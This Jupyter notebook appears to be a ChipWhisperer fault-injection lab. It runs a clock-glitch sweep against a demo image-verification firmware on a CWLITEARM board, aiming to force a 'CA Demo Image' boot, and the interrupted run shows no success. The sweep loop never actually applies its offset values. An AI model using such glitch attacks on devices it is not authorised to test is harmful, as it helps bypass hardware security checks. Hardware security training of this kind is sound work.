In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'

In [ ]:
%%bash -s "$PLATFORM"
make PLATFORM=$1

In [ ]:
%run "Helper_Scripts/Setup_Generic.ipynb"

In [ ]:
cw.program_target(scope, prog, "image-demo-CWLITEARM.hex")

In [5]:
def glitch_success(resp):
    return "CA Demo Image" in resp

In [6]:
target.flush()
scope.arm()
reset_target(scope)
scope.io.hs2 = "clkgen"

ret = scope.capture()
if ret:
    print("Scope capture timed out")
response = target.read(timeout=10)
print(response)
print(scope.adc.trig_count)
print(glitch_success(response))

 Hash: 0X4C6509CC

RTOS Booted!


166568
False


In [7]:
from collections import namedtuple
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"

scope.io.hs2 = "glitch"

Range = namedtuple('Range', ['min', 'max', 'step'])
offset_range = Range(-49, -30, 1)
scope.glitch.ext_offset = 37
scope.glitch.repeat = 10

print(scope.glitch)

clk_src     = clkgen
width       = 10.15625
width_fine  = 0
offset      = 10.15625
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 37
repeat      = 10
output      = clock_xor



In [15]:
from collections import namedtuple
from tqdm import tnrange

width_range = Range(-10, -5.4, 0.4)
scope.glitch.offset = -39
scope.glitch.width = width_range.min
attack1_data = []
offset_range = Range(165000, 168000, 1)
sample_size = 1
scope.glitch.repeat = 1
print(scope.glitch)
while scope.glitch.width < width_range.max:
    for i in tnrange(offset_range.min, offset_range.max, offset_range.step, leave=False):
        successes = 0
        for i in range(sample_size):
            scope.arm()
            reset_target(scope)
            ret = scope.capture()
            if ret:
                print('Timeout happened during acquisition')

            response = target.read(timeout = 10)

            # for table display purposes
            success = glitch_success(response)
            if success:
                print("Success")
                successes += 1
            if "RTOS" not in response:
                print("Crashed")

        attack1_data.append([scope.glitch.width, scope.glitch.offset, successes/sample_size, repr(response)])
        # run aux stuff that should happen after trace here
    scope.glitch.width += width_range.step
print("Done glitching")

clk_src     = clkgen
width       = -10.15625
width_fine  = 0
offset      = -39.0625
offset_fine = 0
trigger_src = ext_single
arm_timing  = after_scope
ext_offset  = 37
repeat      = 1
output      = clock_xor



KeyboardInterrupt: 

In [10]:
for row in attack1_data:
    if row[2] > 0:
        print(row)